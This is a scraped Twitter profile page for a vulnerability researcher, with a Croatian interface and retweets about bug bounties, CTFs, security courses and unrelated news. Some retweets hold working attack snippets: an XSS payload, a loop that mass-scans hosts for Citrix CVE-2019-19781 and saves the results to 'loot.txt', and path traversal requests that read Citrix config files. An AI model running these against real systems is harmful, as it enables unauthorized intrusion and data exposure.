/home/mohithkalyan

@mohithkalyan

Vulnerability Researcher | My tweets are my own

Chennai
Vrijeme pridruživanja: svibanj 2010.

Tweetovi

Blokirali ste korisnika/cu @mohithkalyan

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @mohithkalyan

  1. proslijedio/la je Tweet

    Btw there's a lot of misinformation about numbers online (surprise). The Chinese gov have a tracker here they update daily: Red number (17335) is confirmed infected, i.e. tested in hospital. Gray number (361) is dead.

    Prikaži ovu nit
    Poništi
  2. proslijedio/la je Tweet
    2. velj

    I added a script to generate the PDF & archive for my Exam Report Template in Markdown, as I saw a lot of people where creating their own scripts.

    Poništi
  3. proslijedio/la je Tweet
    2. velj

    Can your EDR detect symbolic link callback rootkits? Because ours sure as heck can't. and I wrote about these!

    Poništi
  4. proslijedio/la je Tweet
    30. sij

    I earned 2x$350 for my 2 submissions on . Both were stored XSS with a simple payload "><img src=x onerror=alert(1)>.

    Prikaži ovu nit
    Poništi
  5. proslijedio/la je Tweet
    30. sij

    Some hunters made over €50.000 in bug bounties with this simple trick. 🤑 Thanks for the , !

    Prikaži ovu nit
    Poništi
  6. proslijedio/la je Tweet
    27. sij

    Amazing: a termite track (top) and an ant track (bottom) • each travelling insect is protected by its own column of soldiers, no fights necessary | 📹 via Mehdi Moussaid

    Poništi
  7. proslijedio/la je Tweet
    27. sij

    looking for some new dirs to bruteforce?

    Poništi
  8. proslijedio/la je Tweet
    23. sij

    Microsoft have released an open source tool to analyze source code for vulnerabilities in almost any modern language:

    Poništi
  9. proslijedio/la je Tweet
    21. sij
    Odgovor korisniku/ci
    Poništi
  10. proslijedio/la je Tweet
    18. sij

    RPISEC RE/VR Courses: Secure Software Principles , Malware Analysis , Advanced Exploitation and Rootkit Development , Program Obfuscation ,Windows Exploitation , Hardware Reverse Engineering , Modern Binary Exploitation , Malware Analysis: cr

    Poništi
  11. proslijedio/la je Tweet
    15. sij

    Registration for the 2020 Metasploit community CTF is now open. 1,000 teams, four days to find flags, unlimited shells. Play starts January 30. NOTE: Teams only need to register ONE account. Get it:

    Poništi
  12. proslijedio/la je Tweet
    13. sij

    Want Free💰? Jump on the Citrix wagon! Pick a program on git clone cd check-cve-2019-19781 pip3 install -r requirements.txt cat hosts.txt | while read url ; do cve-2019-19781 ;done > loot.txt 2>&1 cat loot.txt | grep appear

    Poništi
  13. proslijedio/la je Tweet
    13. sij

    Who wanna find Critical (P1) vulnerabilities just in 10 seconds? An easy bounty tip for you. [PHP] Exposing DB Credentials / HttpOnly Bypass / Full Path Disclosure

    Poništi
  14. proslijedio/la je Tweet
    8. sij

    CVE-2019-19781 Citrix path traversal base on vpns folder Example: GET /vpn/../vpns/services.html GET /vpn/../vpns/cfg/smb.conf patch >> HTTP/1.1 403 Forbidden no patch >> HTTP/1.1 200 OK [global] encrypt passwords = yes name resolve order = lmhosts wins host bcast

    Prikaži ovu nit
    Poništi
  15. proslijedio/la je Tweet
    11. sij

    Let's do the 20k giveaway! Up for grabs: (1) Burp Suite Pro license (5) Udemy PEH course seats Rules: -1 entry per person -Must have retweeted and be a follower on Twitter at the time of the giveaway -Donation of first born child optional

    Poništi
  16. proslijedio/la je Tweet
    11. sij

    New video incoming! 🚨 In this video, we talk APIs. What they are, where to find them, and most importantly how to test them for bugs! We cover: API recon, the most common API bugs and teach you how to find them

    Poništi
  17. proslijedio/la je Tweet
    7. sij

    So my guest blog post for about my recon techniques is finally out. Check it out here-

    Poništi
  18. proslijedio/la je Tweet

    Our researchers found multiple vulnerabilities in TikTok leading to account manipulation

    Poništi
  19. proslijedio/la je Tweet

    Be prepared, there is a small chance that our horrendous leadership could unknowingly lead us into World War III.

    Poništi
  20. proslijedio/la je Tweet
    2. sij

    To bring in the new year here's a new blog post about empirically testing Windows Service Hardening to see if it is really not a security boundary even on Windows 10. h/t

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·